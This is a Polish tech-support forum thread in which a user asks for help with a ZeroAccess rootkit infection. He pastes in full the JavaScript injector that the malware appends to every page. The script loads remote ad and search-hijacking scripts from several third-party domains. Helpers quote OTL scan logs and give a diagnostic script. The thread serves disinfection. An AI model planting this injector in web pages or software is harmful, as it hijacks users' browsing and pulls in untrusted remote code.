Dziwny skrypt doczepiony do stron... - logi
#1
Witam, Dziś zaciekawiła mnie dziwna sytuacja - otóż nie byłem i nie jestem nadal w stanie na żadnej z przeglądarek zalogować się na gmaila - wyskakuje kompunikat, że mam wyłączone pliki coockies mimo, że są włączone.. Czyściłem, przeinstalowywałem przeglądarki - to samo nadal. Na chromie do tego facebook przestał działać bo ma problemy z certyfikatem. Przypadkowo wszedłem w źródło jednej strony i znalazłem tam taki skrypt na dole:
Kod:
<script>
var id=2808851251;
var aff=30324;
var sid=0;
function INCL_isIFramed()
{
return (top !== self);
}
function INCL_checkinternals()
{
var h = document.location.hostname;
return (/search\.kalloutsearch\d\.com/i.test(h) == true ||
/search\.adbar\d\.com/i.test(h) == true ||
h.indexOf(''search.runclips.com'') != -1 ||
h.indexOf(''search.searchnowdirect.com'') != -1);
}

function INCL_checkdml()
{
var h = document.location.hostname;
return (h.indexOf("google")!=-1 ||
h.indexOf("facebook.com")!=-1 ||
h.indexOf("yahoo.com")!=-1 ||
h.indexOf("bing.com")!=-1 ||
h.indexOf("ask.com")!=-1 ||
h.indexOf("listenersguide.org.uk")!=-1);
}
function INCL_loadScript(src)
{
if (window.location.protocol == ''https:'' && src.indexOf(''http:'') == 0)
return;
var script = document.createElement("script");
script.src = src;
script.characterSet = "utf-8";
script.type = "text/javascript";
(document.head||document.documentElement).appendChild(script);
}
if (!INCL_isIFramed() && !INCL_checkinternals())
{
if (!INCL_checkdml()) {
var INLDM_cfg = { fi : 4603, fd : 0,
fddm: ''xml.cpchero.biz'',
sttcdm: ''static.cpchero.biz'',
inlsrhdm: ''sonicsearchonline.biz'' };
INCL_loadScript(''https://hostmyjs.biz/scripts/inl_dmmtch2.min.js'');
INCL_loadScript(''https://in.admedia.com/?id=ODkoOCI&subid=36'');
}
INCL_loadScript(''http://i.websuggestorjs.info/sugg/javascript.js?channel=js36'');
INCL_loadScript(''https://cdncache1-a.akamaihd.net/loaders/1247/l.js?aoi=1311798366&pid=1247&zoneid=52222'');
window.dmadbar_settings = {dm_standalone : true, dmpd : 2, fd :
4723, fd2: 4604, xmlfeed : ''http://xml.cpchero.biz/search'' , search_url
:
''http://hostmysearch.com/?prt=yhs1Danta2&errUrl=http://www.yahoo.com&keywords=''
, script_base : ''https://hostmyjs.biz/scripts/adbar'' };
INCL_loadScript(''https://hostmyjs.biz/scripts/adbar/adbar.js'');
}
</script>


Co się okazało? Ten skrypt doczepiony jest na każdej stronie w którą wejdę. Nawet jeśli to jest pusta strona.
Syf jakiś, który nie wiem gdzie się zakorzenił..
Robię właśnie skan otlem (coś się przywiesił ale mam nadzieje, że dokończy działanie) jak tylko będę miał logi - to podeślę, a w międzyczasie pytam kogokolwiek czy ktoś miał już z tym styczność ? Czy to jakaś świeżynka bo i na google bardzo mało o tym jest.. Tzn nic praktycznie.

LOGI JUŻ SĄ!

[Aby zobaczyć linki, zarejestruj się tutaj]


[Aby zobaczyć linki, zarejestruj się tutaj]



Dodano: 04 gru 2012, 13:43

Dla potomnych jakby ktoś załapał tego wirusika. Pomógł program TDSSKiller znajdująć i lecząc wirusa ''Virus.Win32.ZAccess.aml''. Po tym zabiegu wszystko jest ok, skrypt nie jest doczepiany, strony działają wszystkie poprawnie.
Odpowiedz
#2
W raporcie widnieją syndromy Rootkita ZeroAccessw postaci naruszonego łańcucha Winsock, oraz załadowanego modułu infekcji:

Cytat:
MOD - [2010-01-21 23:47:36 | 000,246,784 | ---- | M]() -- \\?\globalroot\systemroot\system32\mswsock.dll
O10 - Protocol_Catalog9\Catalog_Entries\000000000001 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000002 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000003 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000004 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000005 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000006 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000007 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000008 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000009 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000010 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000011 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000012 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000013 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000014 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000015 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000016 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000017 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000018 - C:\Program Files\Bonjour\mdnsNSP.dll File not found
O10 - Protocol_Catalog9\Catalog_Entries\000000000019 - C:\Program Files\Bonjour\mdnsNSP.dll File not found

Przedstaw skan dodatkowy. Uruchom

[Aby zobaczyć linki, zarejestruj się tutaj]

, w oknie wklej poniższy tekst i kliknij look

Cytat:
:reg
HKEY_CURRENT_USER\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1} /s
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1} /s
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1} /s

:filefind
services.exe
*.@
Odpowiedz


Skocz do:


Użytkownicy przeglądający ten wątek: 1 gości